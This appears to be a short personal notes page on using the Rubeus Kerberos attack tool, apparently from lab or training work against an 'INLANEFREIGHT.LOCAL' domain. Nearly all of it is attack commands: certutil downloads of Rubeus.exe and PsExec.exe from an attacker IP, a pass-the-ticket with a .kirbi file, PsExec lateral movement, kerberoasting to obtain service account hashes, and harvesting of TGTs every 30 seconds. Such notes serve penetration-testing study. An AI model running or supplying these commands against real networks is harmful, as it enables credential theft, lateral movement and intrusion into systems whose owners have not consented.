Skip to content

Rubeus.exe

Source

source 1 * https://github.com/GhostPack/Rubeus * https://github.com/r3motecontrol/Ghostpack-CompiledBinaries source 2 - my github fork for compiled binaries 

git clone https://github.com/szalek/Ghostpack-CompiledBinaries.git /opt/windows/GhostpackBinaries
source 3 - kali 
mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/GhostpackBinaries/Rubeus.exe .

Passing the Ticket: Rubeus

# certutil -urlcache -f http://10.10.14.84/Rubeus.exe Rubeus.exe
# certutil -urlcache -f http://10.10.14.84/PsExec.exe PsExec.exe
Rubeus.exe ptt /ticket:2-40a10000-web-win01$@HOST~MS01.INLANEFREIGHT.LOCAL-INLANEFREIGHT.LOCAL.kirbi
PsExec.exe \\172.16.6.3 cmd.exe
ipconfig

Obtain the hash for the service account.

./Rubeus.exe kerberoast /nowrap

Harvesting Tickets

Harvesting gathers TGTs every 30 seconds that are being transferred to the KDC 

Rubeus.exe harvest /interval:30